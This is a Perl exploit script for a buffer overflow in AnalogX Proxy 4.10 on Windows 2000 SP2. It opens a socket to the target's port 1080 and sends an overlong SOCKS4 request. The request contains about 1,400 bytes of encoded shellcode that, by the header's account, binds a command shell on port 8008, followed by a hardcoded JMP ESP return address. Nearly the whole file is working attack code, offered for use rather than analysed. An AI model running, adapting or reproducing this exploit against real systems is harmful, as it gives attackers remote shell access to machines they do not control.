#!/usr/local/bin/perl

# PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE
#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
#modified by Sballo the super mega h4x0r that the "system" system calls To Code EveryThing :)
#
# binds a Shell on 8008
#

use Socket;

if (@ARGV != 1){
print " AnalogX Proxy Version 4.10 exploit for Japanese(English) Windows 2000 Pro (SP2)
 written by Kanatoko <anvil\@jumperz.net>
 http://www.jumperz.net/
 Modified by J0zLame
 Spawns a  Shell on port 8008
 thanx to: hsj (http://hsj.shadowpenguin.org/)
 Mod-Thanks to (|Zan  http://www.deepzone.org/)";

print "\n\n./$0 <AnaloX-Server-IP>\n";exit(1);}

$connect_host = $ARGV[0];
$port = 1080;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);


#the old egg
        # egg written by UNYUN (http://www.shadowpenguin.org/)
        # 57bytes
#$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
#$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
#$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
#$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
#$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
#$egg .= "notepad.exe";





#########################################
$egg  ="\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41";
$egg .="\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f";
$egg .="\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04";
$egg .="\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e";
$egg .="\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32";
$egg .="\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99";
$egg .="\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c";
$egg .="\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9";
$egg .="\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71";
$egg .="\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9";
$egg .="\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93";
$egg .="\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99";
$egg .="\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99";
$egg .="\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14";
$egg .="\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17";
$egg .="\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d";
$egg .="\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99";
$egg .="\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66";
$egg .="\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d";
$egg .="\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7";
$egg .="\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9";
$egg .="\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9";
$egg .="\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a";
$egg .="\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14";
$egg .="\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87";
$egg .="\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9";
$egg .="\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32";
$egg .="\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99";
$egg .="\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98";
$egg .="\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf";
$egg .="\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99";
$egg .="\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3";
$egg .="\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3";
$egg .="\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99";
$egg .="\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99";
$egg .="\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13";
$egg .="\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9";
$egg .="\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2";
$egg .="\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf";
$egg .="\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a";
$egg .="\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c";
$egg .="\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d";
$egg .="\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9";
$egg .="\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa";
$egg .="\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce";
$egg .="\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99";
$egg .="\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3";
$egg .="\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4";
$egg .="\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07";
$egg .="\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c";
$egg .="\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03";
$egg .="\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a";
$egg .="\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b";
$egg .="\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07";
$egg .="\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97";
$egg .="\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9";
$egg .="\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c";
$egg .="\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9";
$egg .="\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99";
$egg .="\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9";
$egg .="\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66";
$egg .="\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d";
$egg .="\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d";
$egg .="\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9";
$egg .="\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99";
$egg .="\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce";
$egg .="\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a";
$egg .="\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9";
$egg .="\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99";
$egg .="\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1";
$egg .="\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d";
$egg .="\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9";
$egg .="\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99";
$egg .="\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14";
$egg .="\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c";
$egg .="\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a";
$egg .="\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9";
$egg .="\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99";
$egg .="\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12";
$egg .="\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a";
$egg .="\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9";
$egg .="\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b";
$egg .="\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a";
$egg .="\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34";
$egg .="\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99";
$egg .="\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1";
$egg .="\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2";
$egg .="\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38";
$egg .="\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59";
$egg .="\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce";
$egg .="\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6";
$egg .="\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd";
$egg .="\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8";
$egg .="\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7";
$egg .="\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5";
$egg .="\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed";
$egg .="\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab";
$egg .="\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0";
$egg .="\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8";
$egg .="\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8";
$egg .="\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb";
$egg .="\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc";
$egg .="\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0";
$egg .="\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5";
$egg .="\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8";
$egg .="\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0";
$egg .="\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5";
$egg .="\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc";
$egg .="\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1";
$egg .="\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99";
$egg .="\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc";
$egg .="\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99";
$egg .="\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90";;
#####################################################################


$buf  = "\x04\x01\x00\x19\x00\x00\x00\x01";
$buf .= "A" x 32;
$buf .= $egg;
$buf .="\x8c\x3e\x1d\x01";
$buf .= "\x00";
$buf .= "A" x 144;

	#
        # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
        # If you use English Windows 2000, try 0x77E2492B
#$buf .= "\x2B\x49\xdf\x77";
$buf .= "\x77\xE2\x49\x2B";
        # JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";

#
sleep(3);
print SOCKET $buf;

close(SOCKET);